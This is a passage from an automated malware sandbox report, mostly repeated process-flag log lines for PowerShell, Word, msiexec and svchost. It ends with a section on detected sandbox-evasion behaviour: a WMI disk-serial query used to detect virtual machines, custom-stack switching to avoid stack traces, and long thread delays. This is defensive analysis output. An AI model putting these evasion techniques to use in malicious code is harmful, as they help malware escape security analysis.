                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmprph.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmprph.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmprph.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 52BB83A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
